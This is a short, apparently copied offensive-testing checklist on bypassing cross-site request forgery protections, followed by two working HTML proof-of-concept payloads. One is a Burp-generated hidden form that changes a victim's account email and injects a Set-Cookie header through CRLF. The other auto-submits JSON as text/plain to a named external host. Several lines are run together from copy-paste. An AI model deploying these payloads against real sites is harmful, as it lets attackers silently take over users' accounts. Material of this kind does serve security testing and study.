CSRF

CSRF Checklist

• [ ] Remove Anti-CSRF Token

• [ ] No check for the user's Token

• [ ] Weak Token

• [ ] Reusable token

• [ ] Change request method

• [ ] Guessable Token

• [ ] Bypass referer

• [ ] Modifying Parameter Names => POST To GET

• [ ] Modifying Parameter Names[https://example.com/my/dear/api/val/num?_method=PUT](<https://example.com/my/dear/api/val/num?_method=PUT>)*X-HTTP-MethodX-HTTP-Method-OverrideX-Method-Override*

• [ ] Custom header token bypass|

• [ ] Test the request without the **Customized Token and also header.**Test the request with exact same length but a different token.

• [ ] CSRF token is verified by a cookie

<html>

<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->

<body>

<script>history.pushState('', '', '/')</script>

<form action="<https://example.com/my-account/change-email>" method="POST">

<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />

<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />

<input type="submit" value="Submit request" />

</form>

<img src="<https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E>" onerror="document.forms[0].submit();"/>

</body>

</html>

<aside> 💡 Note that if the csrf token is related to the session cookie this attack won't work because you will need to set the victim to your session, and therefore you will be attacking yourself.

</aside>

Content-Type changeapplication/x-www-form-urlencodedmultipart/form-datatext/plain

Example (from here) of sending JSON data as text/plain:

<html>

<body>

<form id="form" method="post" action="<https://phpme.be.ax/>" enctype="text/plain">

<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "<https://webhook/>"}'>
Copy
</form>

<script>

form.submit();

</script>

</body>

</html>